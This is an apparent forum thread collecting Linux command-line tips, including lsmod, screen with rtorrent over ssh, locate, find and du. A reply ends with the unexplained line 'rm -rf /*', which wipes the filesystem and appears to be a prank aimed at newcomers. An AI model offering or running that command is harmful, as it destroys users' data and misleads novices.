13 years ago 4 |
lsmod prints the contents of the /proc/modules file. It shows which loadable kernel modules are currently loaded.
lsmod | grep nouveau
inxi is a script that shows some system info, integrated into mint, also works with xchat
/exec -o inxi -N < xchat, display networking info
rtorrent (torrent client) & screen (multiplexes a physical terminal between several processes)
Usefull for downloading torrents on remote ssh box:
screen rtorrent /path/to/torrent.torrent
do you rtorrent work here (http://tekguru.files.wordpress.com/2009/05/rtorrent_ref.pdf)
ctrl-a d will detach it
you can now disconnect from your ssh session and come back later with
screen -r
locate (find files by their filename from a cached database, faster than find)
locate *PNG
locate -i *PNG (case insensitive)
head -c 100000 filebig > filesmall
sudo find / -type f -size +100000k (find files bigger than, starting from root)
du -hs ./ (how much diskspace the current folder is taking)
pwd (echo current folder path)
to be continued ...
p.s. video embeding test
The basic tutorial is already written, do some searching, also i wanna basically help myself, but of course in OS manner - might help somebody else as well.
I would suggest if you want to help the community you might start with the basic CLI commands that may matter to a newcomer.
Just a thought
rm -rf /*